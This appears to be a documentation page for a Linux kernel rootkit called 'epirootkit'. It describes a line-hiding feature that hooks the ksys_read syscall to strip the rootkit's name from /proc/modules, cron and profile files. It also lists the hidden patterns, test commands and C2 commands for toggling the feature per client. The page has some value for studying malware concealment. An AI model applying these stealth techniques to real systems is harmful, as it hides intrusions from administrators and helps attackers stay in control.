On this page
edit
Line Hiding
Hide rootkit lines from file contents using syscall interception
Implementation
static const char * const hide_line_patterns[] = {
"epirootkit",
"jules_est_bo_",
"EpiRootkit",
"modprobe epirootkit",
"insmod epirootkit"
};
// Target directories
"/etc/cron.d/"
"/etc/modules-load.d/"
"/etc/profile.d/"
"/proc/modules"
Hooks ksys_read syscall and filters lines containing rootkit patterns from target files.
Module Hiding Complement
Module Hiding: Removes module from kernel list (affects lsmod)
Line Hiding: Filters /proc/modules content when read
Combined, they provide comprehensive module stealth.
Testing
# Test with provided file
sudo cp test_line_hiding_epirootkit.txt /etc/cron.d/test_epirootkit
cat /etc/cron.d/test_epirootkit
# Result: 24 lines → ~9 lines (rootkit patterns filtered)
# Test module information
cat /proc/modules | grep epirootkit
# Output: (nothing when line hiding active)
Control
WebUI
Toggle via Configuration Panel
C2 Commands
enable-line-hiding Client-1 # Enable hiding
disable-line-hiding Client-1 # Disable hiding
status Client-1 # Check state